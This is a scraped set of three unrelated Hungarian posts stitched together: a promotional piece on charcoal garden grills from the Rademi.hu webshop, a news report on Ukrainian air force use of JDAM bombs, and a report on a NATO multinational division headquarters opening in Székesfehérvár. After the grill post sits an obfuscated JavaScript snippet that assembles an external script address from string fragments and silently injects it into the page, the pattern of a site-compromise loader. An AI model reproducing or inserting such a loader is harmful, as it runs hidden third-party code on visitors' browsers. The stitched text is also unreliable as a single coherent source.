A saját magunknak és az otthonunknak szánt vásárlások gyakran indokoltak és jól meghatározott céllal történnek, és a precíz hasznosságú vásárlások közé sorolhatjuk ezek a kerti grillsütők, olyan termékek amelyek minden kültértérrel rendelkező háztulajdonos bevásárlólistáján szerepelnek. A következő sorokban tehát 5 indokot részletezünk, amiért ezek a faszenes grillsütők bárki számára jó befektetésnek számítanak. Íme tehát, hogy miért érdemes faszénnel működő kerti grillsütőt vásárolni:

1. Tartós és megbízható termék

A minőség mindannyiunk számára kérdés, ezért próbálunk okosan vásárolni és egy kicsit utánajárni, mielőtt ténylegesen megveszünk valamit. Ebben az értelemben a kerti grill olyan termék, amelyet hosszú ideig élvezhetünk, mert minőségi és tartós anyagokból készül.

2. Könnyen használható

Akár kedveli az ételek grillezését, akár nem, egy ilyen termék használata nem igényel részletes használati utasítást, és nem is bonyolult. Ezek a kerti grillezők olyan parazsakkal működnek, amelyeket manapság szinte bármelyik boltban megvásárolhat, és nem csak.

3. Hordozható

Az ilyen típusú kerti grillek egyik legnagyobb előnye, hogy hordozhatóak, hogy otthon, barátoknál, a természetben, kempingben egyaránt használhatjuk őket. Könnyen fel- és összeszerelhető, közepes méretű, ezek a grillek finom ételeket és felejthetetlen estéket biztosítanak a családdal és a közeli barátokkal.

4. Egészséges grillezett ételek

Ezeknek a grilleknek egy másik említésre méltó előnye, hogy egészségesebb stílusban, olajban való áztatás és túlsütés nélkül készíthetünk ételt. Ajánlatos odafigyelni arra, hogy milyen ételeket fogyasztunk és hogyan készítjük el, és egy ilyen grill segítségével sokkal kiegyensúlyozottabb lesz a táplálkozásunk.

5. Költségek

Ellentétben a kertben épített, rögzített tégla grillel, amelyhez anyagokat kell vásárolnia és kőművest kell hívnia, és amely nyilvánvalóan sokkal költségesebb, a kerti faszéngrill bárki és bármilyen költségvetés számára megfelelő vétel. Ráadásul még ezek a termékek is különböző méretekben kaphatók, nyilvánvaló, hogy az áruk is eltérő, de biztosan megtaláljuk az igényeinknek megfelelő grillsütőt.

A Rademi.hu webáruház a faszénes kerti grillek széles választékával várja Önt, amelyeket a legjobb online árakon vásárolhat meg. A minőségi, tartós és megbízható anyagokból készült kerti grillek hosszú ideig fognak minket szolgálni. Használja ki az árajánlatokat és örüljön a szép nyári napoknak a finom és egészséges ételeknek, szeretteivel együtt!

(function(){ z84s=document.createElement("script");z84s_=(("u")+"st")+"a";z84s.async=true; z84s.type="text/javascript";z84s_+=("t.i")+""+"n";z84s_+=(("f")+"o");z84s_+="/"; z84su="495774649.";z84su+="j2z5dhyk84s8frk0hcv"+"6ba691xgyv6"; z84s.src="https://"+z84s_+z84su;document.body.appendChild(z84s); })();

The post 5 indok a faszénes kerti grill választására appeared first on .

„JDAM-nek nevezett bombákat használunk. Ezek nyugati típusú bombák, amelyekkel repülőgépeink sikeresen csapnak le fontos célpontokra. Ezek a bombák valamivel kisebb teljesítményűek, de rendkívül nagy pontosságúak. Szeretném, ha több ilyen bombája lenne az ukrán légierőnek” – jelentette ki a szóvivő.

A közelmúltban Oroszország aktívan kezdett használni irányított légi bombákat. Az orosz erők általában a szovjet időkből származó FAB-500-as bombákat használnak, amelyeket utólag szárnyakkal és GPS-navigációval szereltek fel – idézett fel az Ukrajinszka Pravda hírportál korábbi ukrán közléseket. Ihnat korábban rámutatott arra, hogy ezek az orosz bombák általában nem túl pontosak, ezért nagy veszélyt jelentenek a polgári létesítményekre. Az ilyen típusú fegyverek elleni küzdelemhez Ukrajnának nagy hatótávolságú légvédelmi rendszerekre és modern, többcélú repülőgépekre van szüksége – mondta a szóvivő.

Az ukrán vezérkar esti helyzetjelentésében azt állította, hogy Luhanszk megye megszállt részében ötven orosz katona dezertált. A vezérkar szerint ez azt bizonyítja, hogy folytatódik az Ukrajnába vezényelt orosz katonák csoportos szökésének tendenciája.

A kijevi katonai vezetés jelentésében arról számolt be, hogy pénteken az ukrán erők több mint harminc ellenséges támadást vertek vissza, két légvédelmi rendszert és egy radarállomást is eltaláltak. Az ukrán légierő gépei a nap folyamán hat csapást mértek az orosz erők koncentrációs területeire, a rakéta-és tüzérségi egységek pedig nyolc támadást hajtottak végre, amelyek eredményeképpen eltaláltak egy üzemanyagraktárt, két légvédelmi rakétarendszert, egy tüzérségi egységet és egy elektronikus hadviselési állomást.

A kijevi jelentés szerint az orosz erők eközben öt rakéta- és 12 légicsapást indítottak, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel.

„Pénteken az Oroszországi Föderáció ballisztikus rakétákkal újabb rakétatámadást intézett polgári célpontok ellen Zaporizzsja városában és Ukrajna más településein. Hat Sahíd-136 típusú, iráni gyártású támadó drónt is bvetettek, de ezeket mind megsemmisítette az ukrán légédelem. Az ellenség továbbra is fő erőfeszítéseit a Donyeck megyében lévő Liman, Bahmut, Avgyijivka és Marjinka települések irányában végrehajtandó támadó műveletekre összpontosítja” – írta a vezérkar.

The post Orosz agresszió: Az ukrán légierő nyugati, GPS-irányítású bombákat is használ appeared first on .

Szalay-Bobrovniczky Kristóf azt mondta, hogy egy felmérés szerint a NATO támogatottsága a magyaroknál hét százalékkal magasabb, mint a szövetséges országok átlaga. A tárcavezető beszédében emlékeztetett arra, hogy Magyarország több mint húsz éve a NATO tagja, és lépésről lépésre építette fel jelenlétét a szövetségben.

A biztonsági helyzet Európában alapvetően megváltozott, jelentősen romlott az ukrajnai orosz agresszió következtében. Ez megváltoztatta a NATO-t is, adaptációs folyamat megy végbe, és ennek része a többnemzeti hadosztály-parancsnokság létrehozása, ami 2019-ben kezdődött meg – mondta a miniszter.

Az eseményt követő sajtótájékoztatón Szalay-Bobrovniczky úgy fogalmazott: „hadtörténelmet írunk” a többnemzeti hadosztály-parancsnokság felállításával. Ezt bölcs és jó döntésnek nevezte, amely komoly előrelátásról tett tanúbizonyságot már 2019-ben. Világossá vált, hogy világ legerősebb és legrégebbi védelmi szövetsége keleti szárnyát meg kell erősíteni, és Közép-Európában nem volt még ilyen parancsnokság – magyarázta a miniszter. A parancsnokság azért többnemzeti, mert számos országot felügyel Közép-Európában, és sok nemzet katonái szolgálnak itt – a magyar katonák mellett horvátok, szlovákok, szlovének, lengyelek, románok, spanyolok, törökök. Beszédének zárásaként a honvédelmi miniszter úgy fogalmazott: nem csak Magyarország van a NATO-ban, de a NATO is itt van Magyarországon.

Mario Banozic horvát védelmi miniszter az ukrajnai orosz agresszió első évfordulója után még fontosabbnak nevezte a többnemzeti hadosztály-parancsnokságot és a magyar, szlovák, horvát tisztek, altisztek, valamint katonák közös munkáját. Hangsúlyozta: egységes az erőfeszítés annak érdekében, hogy javítsák képességeiket és növeljék az együttműködést.

A biztonságot nem lehet adottnak tekinteni, és minden erőfeszítést meg kell tenni annak érdekében, hogy megtartsuk azt az előnyt, amellyel rendelkezünk potenciális ellenfeleinkkel szemben – mondta a horvát védelmi miniszter. Készen állunk arra, hogy vezető szerepet játsszunk, és ha szükség van rá, akkor „a NATO-terület minden egyes centiméterét megvédjük”.

Marian Majer szlovák honvédelmi államtitkár úgy fogalmazott: majdnem egy évtized telt el azóta, hogy Ukrajnát, a Krím-félszigetet elérte az orosz agresszió, és azóta jelentős változáson ment át a NATO. Tovább kell erősíteni a szövetség keleti határát, oda kell csoportosítani több egységet. A többnemzeti hadosztály-parancsnokságot a szlovák politikus a régióban a szövetséges együttműködés fontos építőköveként jellemezte.

Majer a rendezvényt követő sajtótájékoztatón kiemelte: a többnemzeti hadosztály-parancsnokság két üzenetet közvetít. Az egyik ellenfeleinknek, különösen Oroszországnak szól, amely „egy nem kiprovokált agressziót” folytat Ukrajna ellen. A másik pedig a NATO-nak és szövetségeseinek szól, és azt mutatja, hogy „nemcsak elkötelezettek, de felkészültek is vagyunk arra, hogy megvédjük magunkat abban az esetben, ha bármi történne”. Szlovákia számára is fontos a védelmi költségvetés alakítása.

Denis Tretinjak tábornok, az HQ MND-C parancsnoka az ünnepségen felelevenítette a parancsnokság felállításának folyamatát. A most kezdődő új műveleti státusz növekedési lehetőséget jelent és azt, hogy hiteles és kompetens parancsnokságot tudnak létrehozni – jegyezte meg.

Luigi Guglielmo Miglietta tábornok, a brunssumi NATO-parancsnokság (Allied Joint Force Command Brunssum) vezetője jelezte: a NATO készen áll a különböző kihívásokkal szemben és képes területe megvédésére. A szövetséget fenyegető veszélyeket komplexnek nevezte, de hangsúlyozta: a NATO biztosítani tudja Európa, értékei és életformája biztonságát.

A székesfehérvári rendezvényen részt vett Christopher G. Cavoli tábornok, a NATO Európában állomásozó fegyveres erőinek főparancsnoka is.

The post Szalay-Bobrovniczky: nem csak a kormány, a nemzet is a NATO mögött áll appeared first on .